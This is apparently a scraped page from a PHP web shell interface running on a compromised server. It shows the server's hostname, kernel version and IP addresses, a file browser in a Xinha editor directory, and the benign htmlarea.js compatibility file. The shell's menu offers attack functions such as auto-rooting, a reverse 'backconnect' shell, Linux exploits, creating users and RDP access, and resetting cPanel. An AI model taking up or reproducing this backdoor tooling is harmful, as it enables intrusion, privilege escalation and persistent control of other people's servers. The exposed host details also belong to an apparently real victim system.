Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
usermin /
file /
xinha /
[ HOME SHELL ]
Name
Size
Permission
Action
contrib
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
iconsets
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
popups
[ DIR ]
drwxr-xr-x
skins
[ DIR ]
drwxr-xr-x
Xinha.css
8.05
KB
-rw-r--r--
XinhaCore.js
91.56
KB
-rw-r--r--
htmlarea.js
1012
B
-rw-r--r--
license.txt
1.59
KB
-rw-r--r--
release-notes.txt
18.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : htmlarea.js
/*--------------------------------------:noTabs=true:tabSize=2:indentSize=2:-- -- COMPATIBILITY FILE -- htmlarea.js is now XinhaCore.js -- -- $HeadURL:http://svn.xinha.webfactional.com/trunk/htmlarea.js $ -- $LastChangedDate:2007-01-15 15:28:57 +0100 (Mo, 15 Jan 2007) $ -- $LastChangedRevision:659 $ -- $LastChangedBy:gogo $ --------------------------------------------------------------------------*/ if ( typeof _editor_url == "string" ) { // Leave exactly one backslash at the end of _editor_url _editor_url = _editor_url.replace(/\x2f*$/, '/'); } else { alert("WARNING: _editor_url is not set! You should set this variable to the editor files path; it should preferably be an absolute path, like in '/htmlarea/', but it can be relative if you prefer. Further we will try to load the editor files correctly but we'll probably fail."); _editor_url = ''; } document.write('<script type="text/javascript" src="'+_editor_url+'XinhaCore.js"></script>');
Close